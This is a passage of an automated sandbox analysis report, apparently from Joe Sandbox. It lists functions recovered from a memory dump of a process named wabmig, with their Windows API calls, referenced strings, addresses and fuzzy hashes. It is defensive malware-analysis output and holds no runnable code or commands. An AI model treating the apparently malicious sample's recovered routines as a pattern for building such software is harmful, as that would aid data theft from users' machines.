                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 2029023288-3849865405
                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                            • memset.MSVCRT ref: 00405455
                                                                            • memset.MSVCRT ref: 0040546C
                                                                            • memset.MSVCRT ref: 00405483
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy$ErrorLast
                                                                            • String ID: 6$\
                                                                            • API String ID: 404372293-1284684873
                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                            • String ID:
                                                                            • API String ID: 1331804452-0
                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: advapi32.dll
                                                                            • API String ID: 2012295524-4050573280
                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                            • <%s>, xrefs: 004100A6
                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                            • API String ID: 3473751417-2880344631
                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2521778956-791839006
                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscpy
                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                            • API String ID: 999028693-502967061
                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                            Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                            • memset.MSVCRT ref: 00408E46
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2350177629-0
                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                            Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                            • API String ID: 2221118986-1606337402
                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                            Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                            • memset.MSVCRT ref: 00408FD4
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                            • memset.MSVCRT ref: 00409042
                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                            • String ID:
                                                                            • API String ID: 265355444-0
                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                            Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                            • memset.MSVCRT ref: 0040C439
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 4131475296-0
                                                                            • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                            • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004116FF
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2618321458-3614832568
                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFilefreememset
                                                                            • String ID:
                                                                            • API String ID: 2507021081-0
                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                            • malloc.MSVCRT ref: 00417524
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                            • free.MSVCRT ref: 00417544
                                                                            • free.MSVCRT ref: 00417562
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                            • String ID:
                                                                            • API String ID: 4131324427-0
                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                            • free.MSVCRT ref: 0041822B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PathTemp$free
                                                                            • String ID: %s\etilqs_$etilqs_
                                                                            • API String ID: 924794160-1420421710
                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                            Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                            • API String ID: 1775345501-2769808009
                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                            Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcscpy.MSVCRT ref: 0041477F
                                                                            • wcscpy.MSVCRT ref: 0041479A
                                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                                            • String ID: General
                                                                            • API String ID: 999786162-26480598
                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                            Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                            • String ID: Error$Error %d: %s
                                                                            • API String ID: 313946961-1552265934
                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                            Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                            • API String ID: 0-1953309616
                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                            • API String ID: 3510742995-272990098
                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044A6EB
